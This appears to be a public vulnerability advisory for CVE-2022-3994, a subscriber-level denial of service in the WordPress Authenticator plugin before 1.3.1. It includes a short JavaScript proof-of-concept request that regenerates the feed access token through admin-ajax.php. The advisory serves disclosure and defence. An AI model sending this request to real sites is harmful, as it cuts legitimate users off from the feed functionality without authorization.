Authenticator < 1.3.1 – Subscriber+ Denial of Service via Feed Token Disclosure | CVE 2022-3994 | Plugin Vulnerabilities

Description

The plugin does not prevent subscribers from updating a site's feed access token, which may deny other users access to the functionality in certain configurations.

Proof of Concept

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=regenerate_token&nonce='+authenticatorUI.nonce
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Fixed in 1.3.1

References

CVE

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

802a2139-ab48-4281-888f-225e6e3134aa

Timeline

Publicly Published

2022-12-09 (about 3 years ago)

Added

2022-12-09 (about 3 years ago)

Last Updated

2022-12-09 (about 3 years ago)

Other

Published

Title

Published

2021-10-25

Title

Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS

Published

2014-11-20

Title

WordPress <= 4.0 - Long Password Denial of Service (DoS)

Published

2019-11-05

Title

Safe SVG <= 1.9.4 - Denial of Service

Published

2025-09-25

Title

Download After Email 2.1.5 - 2.1.6 - Unauthorized Repeated Form Submissions

Published

2025-03-20

Title

WP-GeSHi-Highlight <= 1.4.3 - Author+ ReDoS